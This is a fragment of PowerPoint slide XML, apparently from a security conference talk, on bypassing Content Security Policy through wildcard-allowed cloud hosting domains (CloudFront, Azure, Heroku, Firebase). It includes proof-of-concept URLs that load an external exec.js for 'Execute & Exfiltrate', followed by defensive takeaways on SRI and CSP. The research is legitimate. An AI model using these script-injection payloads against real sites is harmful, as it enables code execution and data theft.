                        <a:t>Amazon CloudFront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latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure Web Apps</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3621222706"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>N. Sites</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>~100</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>~100</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2107117426"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Symptoms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latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.cloudfront.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.azurewebsites.net, *.azurestaticapps.net</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1268481039"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Purpose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dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Execute &amp; Exfiltrate</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Execute &amp; Exfiltrate</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3719631833"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PoC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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://cloudfront.keyfc.com/secret.php?source=https://d15xoolnwhr0d8.cloudfront.net/js/exec.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="2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 </a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2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a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>https://azure.keyfc.com/secret.php?source=https://nice-dune-08c8da410.3.azurestaticapps.net/exec.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="0" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3448830291"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FAF18B3-CF1B-8953-92B0-27B3D33544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0389" y="1713606"/>
            <a:ext cx="414264" cy="4142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78F8944-91F3-3FA9-AA02-D3F6C834F8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95" t="33866" r="74950" b="32267"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7253604" y="1665204"/>
            <a:ext cx="566173" cy="4846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32345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B526528E-5DBA-FFD9-FEE4-FA04EA609738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1045164209"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="368910" y="1702058"/>
          <a:ext cx="11454176" cy="4297680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{72833802-FEF1-4C79-8D5D-14CF1EAF98D9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2109114">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="406545722"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4690872">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2772294243"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4654190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2187995182"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:endParaRPr lang="en-GB" sz="2800" dirty="0">
                        <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Heroku</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Firebase</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3621222706"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>N. Sites</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>~18</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>~ 15</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2107117426"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Symptoms</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.herokuapps.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*.firebaseapp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1268481039"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Purpose</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Execute &amp; Exfiltrate</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Execute &amp; Exfiltrate</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3719631833"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PoC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cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://heroku.keyfc.com/secret.php?source=https://exfiltest-75310ac89c2a.herokuapp.com/exec.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="2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cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>https://firebase.keyfc.com/secret.php?source=https://demo-defcon.firebaseapp.com/exec.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-GB" altLang="en-US" sz="2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txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3448830291"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8FECB21-2CF1-FC64-4F3D-9811EB7CCE42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="392815"/>
            <a:ext cx="10534650" cy="728620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PoC 7 and 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="Heroku Logo transparent PNG - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6885EF-D38C-717A-71F0-F76E987D4F8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903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3191256" y="1729490"/>
            <a:ext cx="370332" cy="4630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rebase Logo transparent PNG - StickPNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA23D147-0A4C-7579-37A5-1355FDA532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0756" y="1729490"/>
            <a:ext cx="322009" cy="44200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195431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AA5432-2B17-24EF-A562-534F30943106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1842654" y="2444539"/>
            <a:ext cx="8506691" cy="19689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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24050848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button on a yellow and black striped surface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF7E26C-4EBF-5CF0-9CAE-628A2736EF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213726" y="643466"/>
            <a:ext cx="7764548" cy="5571067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274697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51BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828673" y="3928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7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510986" y="1883493"/>
            <a:ext cx="11170023" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use Sub Resource Integrity (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SRI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) together with CSP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="4400" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Change from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsafe-eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsafe-inline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
